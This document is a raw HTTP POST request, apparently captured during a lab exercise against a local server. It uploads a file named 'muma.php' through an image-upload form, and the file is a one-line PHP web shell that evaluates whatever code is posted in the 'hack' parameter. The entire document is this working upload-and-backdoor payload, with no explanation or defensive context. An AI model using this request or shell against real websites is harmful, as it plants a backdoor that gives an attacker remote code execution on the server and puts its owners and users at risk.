POST /?page=upload HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------15155688852954365454936152814
Content-Length: 399
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------15155688852954365454936152814
Content-Disposition: form-data; name="file-upload-field"; filename="muma.php"
Content-Type: application/octet-stream

<?php @eval($_POST['hack']); ?>
-----------------------------15155688852954365454936152814
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------15155688852954365454936152814--
